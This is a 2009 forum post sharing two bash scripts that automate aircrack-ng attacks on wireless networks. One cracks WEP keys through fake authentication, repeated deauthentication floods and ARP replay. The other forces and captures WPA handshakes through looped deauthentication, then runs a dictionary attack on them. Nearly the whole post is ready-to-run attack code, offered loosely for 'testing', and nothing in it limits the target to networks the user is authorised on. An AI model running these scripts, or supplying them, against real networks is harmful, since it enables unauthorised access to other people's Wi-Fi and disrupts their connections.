frog_bong Posted November 10, 2009

We all know that Wired Equivalent Privacy is entirely breakable and that Wireless Protected Access can be broken using a word-list or hash-tables. Here are a couple of scripts to HELP you test these things. Make sure aircrack-ng is installed.

#!/bin/bash
##
### Automatic wep-cracking script (run this as ROOT): by frogbong (frogbong.wilson@gmail.com)
## Note: This script will not work 100% of the time, it is merely a way to reduce typing
#
export IFACE
export BSSID
export CHANNEL

### Check for argument
if [ -z "$1" ]
then
    echo "Usage: $0 <interface>"
    echo "Set MONITOR mode interface."
    exit 1
fi

### Start airodump-ng to collect target information
IFACE=$1
sudo airodump-ng "$IFACE"

echo "### TARGET INFORMATION ###"
echo "Enter BSSID: "; read BSSID
echo "Enter AP Channel: "; read CHANNEL
echo "Enter Target MAC (optional): "; read CLNTMAC   # read here but not used below

echo "Starting auto-wep.sh with these parameters: "
echo " Interface: $IFACE"; sleep 1
echo " BSSID: $BSSID"; sleep 1
echo " Channel: $CHANNEL"; sleep 1

### Start wep cracking process using components of aircrack-ng in the background (&)
# Start airodump-ng to capture to AUTO-WEP*.cap
xterm -e "sudo airodump-ng --bssid $BSSID --channel $CHANNEL -w AUTO-WEP $IFACE" &

# Start aireplay-ng for fake auth.
sleep 3
xterm -e "sudo aireplay-ng -1 0 $IFACE -a $BSSID" &

# Wait for fake association before deauth.
sleep 5
xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; sleep 10; done" &

# Start aireplay-ng for ARP replay
xterm -e "sudo aireplay-ng -3 $IFACE -b $BSSID" &

# Start cracking .cap file after giving some time to generate initialization vectors (IVs)
sleep 60
sudo aircrack-ng AUTO-WEP*.cap

#!/bin/bash
##
### Script to help capture wpa-handshake (run this as ROOT): by frogbong (frogbong.wilson@gmail.com)
##
#
export IFACE
export BSSID
export CHANNEL
export TIME     # time between deauth. broadcasts
export CLIENT   # client to deauth. (optional)

### Check for argument
if [ -z "$1" ]
then
    echo "Usage: $0 <interface>"
    echo "Set MONITOR mode interface."
    exit 1
fi

### Start airodump-ng to collect target information
IFACE=$1
sudo airodump-ng "$IFACE"

echo "### TARGET INFORMATION ###"
echo "Enter BSSID: "; read BSSID
echo "Enter AP Channel: "; read CHANNEL
echo "Enter deauth. delay: "; read TIME
echo "Enter client (optional): "; read CLIENT

echo "Starting $0 with these parameters: "
echo " Interface: $IFACE"; sleep 1
echo " BSSID: $BSSID"; sleep 1
echo " Channel: $CHANNEL"; sleep 1
echo " Time Delay: $TIME"; sleep 1
if [ "$CLIENT" != "" ]
then
    echo " Client: $CLIENT"; sleep 1
fi

### Start capture and regular deauth.
# Start airodump-ng to capture handshake to WPA-HS*.cap
xterm -e "sudo airodump-ng --bssid $BSSID --channel $CHANNEL -w WPA-HS $IFACE" &

# Start deauth every $TIME seconds
sleep 3   # wait for airodump to start up
if [ "$CLIENT" != "" ]
then
    xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID -c $CLIENT; echo 'Sleeping for $TIME seconds'; sleep $TIME; done" &
fi
if [ "$CLIENT" = "" ]
then
    xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; echo 'Sleeping for $TIME second(s)'; sleep $TIME; done" &
fi

# Start aircrack-ng in wpa mode to parse the .cap file for handshakes
while true; do aircrack-ng -a 2 WPA*.cap -w /usr/share/dict/american-english; sleep 30; done